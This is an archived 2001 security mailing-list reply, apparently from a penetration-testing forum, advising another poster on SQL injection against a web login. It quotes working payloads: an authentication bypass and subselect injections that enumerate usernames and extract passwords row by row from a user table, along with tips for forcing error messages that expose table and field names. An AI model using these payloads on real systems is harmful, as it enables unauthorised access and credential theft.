Re: SQL Code

From: Kevin Spett (kspettat_private)
Date: Fri Nov 30 2001 - 23:51:10 PST

Previous message: Sacha Faust: "RE: Sacha, was => Re: opinions on Vigliante's SecureScanNX for attack/pen work?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> Username: ' OR ''='
> Password: <blank>
>
> Yields an 'account is locked out message' rather than a password failure
> message regardless of what is put in the password field.
>
> The site allows for users to register as 'guests' for the logon process,
> the username format follows:
>
> Username: blahat_private
> Password: somepassword

Using ' OR ''=' is matching the very first username in the table.  In order
to get the second, try using this:
' + (SELECT Username From Usertable WHERE Username NOT IN  ((SELECT TOP 1
Username FROM Usertable WHERE 1=1)) + '

Get by password by using either:
*'
...or if that doesn't work for some reason...
' + (SELECT password FROM Usertable WHERE Username = /* Put either the
literal username (if you can find it) in quotes or the whole subselect that
you used for the username */) + '

In order to get the next user login, change the NOT IN Value to the literal
username (if you can find it) in quotes of the last username, or the whole
subselect you used for username last time.

These require that you know the name of the table that contains the
usernames and passwords, and the names of username and password fields.
They're usually not hard to guess or figure out from chunks of the sql query
returned in the error message by sending arguments such as ', a', 'a, ;, '
OR, etc.  (this is access or sql server, right?)  Have you tried messing
with the guest registration script, or any of the others on the server for
that matter?


> Invalid advise flags
I think that's a VB Script error, not a database server error.

Good luck.

Kevin Spett
Resident SQL Injection Specialist (I used to be a Resident SQL Injection
Ninja, but one of the suits made me change it.  You like that now, Wade?)
SPI Dynamics, Inc.
.



----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Previous message: Sacha Faust: "RE: Sacha, was => Re: opinions on Vigliante's SecureScanNX for attack/pen work?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Dec 01 2001 - 09:13:45 PST